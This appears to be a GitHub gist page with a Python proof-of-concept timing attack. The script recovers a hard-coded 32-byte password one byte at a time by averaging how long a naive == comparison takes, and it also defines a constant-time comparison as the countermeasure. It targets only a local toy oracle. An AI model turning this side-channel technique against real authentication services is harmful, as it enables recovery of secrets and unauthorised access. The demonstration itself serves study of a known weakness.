Created
December 1, 2013 01:44
-
-
Save chiiph/7727602 to your computer and use it in GitHub Desktop.
Proof of concept wanna be for Python's timing leaks
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import os | |
| import time | |
| import gc | |
| gc.disable() | |
| def const_cmp(str1, str2): | |
| res = len(str1) ^ len(str2) | |
| for a, b in zip(str1, str2): | |
| res |= ord(a) ^ ord(b) | |
| return res == 0 | |
| expected_password = "thisneedstobe32bytesdoyougrokit?" #os.urandom(32) | |
| def oracle(password): | |
| return password == expected_password | |
| def oracle_const(password): | |
| return const_cmp(password, expected_password) | |
| def get_average_time(guessed, c): | |
| time_arr = [] | |
| for i in range(100000): | |
| test_password = guessed + c + "A"*(32-1-len(guessed)) | |
| assert len(test_password) == 32 | |
| start = time.time() | |
| oracle(test_password) | |
| end = time.time() | |
| curt = end-start | |
| time_arr.append(curt) | |
| return sum(time_arr) / float(len(time_arr)) | |
| def attack(): | |
| guessed = "" | |
| for i in range(32): | |
| candidate = None | |
| candidate_time = 0.0 | |
| for b in range(256): | |
| current_time = get_average_time(guessed, chr(b)) | |
| if chr(b) == expected_password[i]: | |
| # Just a check to see what we should've seen | |
| print(current_time, chr(b)) | |
| if candidate_time < current_time: | |
| print(candidate_time, current_time, repr(chr(b))) | |
| candidate = b | |
| candidate_time = current_time | |
| guessed += chr(candidate) | |
| print(repr(guessed)) | |
| print("Attack result:", oracle(guessed)) | |
| if __name__ == "__main__": | |
| attack() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment